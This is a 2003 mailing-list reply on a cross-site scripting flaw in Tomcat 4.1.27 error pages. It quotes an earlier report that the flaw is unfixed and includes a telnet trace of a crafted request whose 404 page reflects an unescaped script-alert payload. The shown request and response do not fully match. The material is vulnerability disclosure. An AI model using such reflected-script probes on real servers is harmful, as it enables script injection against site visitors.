Anyone know how serious this is? It also appears to affect Tomcat 4.1.27 when using mod_jk as well. Below is a sample trace of a HTTP session.

-Dave

> telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /666%0a%0a666.jsp HTTP/1.0
Host: localhost

HTTP/1.1 404 /666 666.jsp
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 29 Sep 2003 18:39:23 GMT
Server: Apache Coyote/1.0
Connection: close

Apache Tomcat/4.1.27 - Error report

HTTP Status 404 - /666 <script>alert("asdf");</script>666.jsp


type Status report

message /666 <script>alert("asdf");</script>666.jsp

description The requested resource (/666 <script>alert("asdf");</script>666.jsp) is not available.


Apache Tomcat/4.1.27

Connection closed by foreign host.

On Sun, September 28, 2003 at 3:14 am, Kan Ogawa sent the following
>
> Jakarta Tomcat 4.1 cross-site scripting vulnerability, which was
> reported last year, is not yet resolved.
>
> http://www.securityfocus.com/archive/82/288502/2002-08-16/2002-08-22/0
>
> I verified this vulnerability on Tomcat 4.1.27 with Coyote HTTP/1.1
> connector.
>
> http://localhost:8080/666%0a%0a666.jsp
>
> On the other hand, on Tomcat 5.0, it was not reproduced.
> Do you neglect to resolve it to Tomcat 4.x, Tomcat committers?
>
> Regards,
>
> --
> Kan Ogawa
> super-creek@jcom.home.ne.jp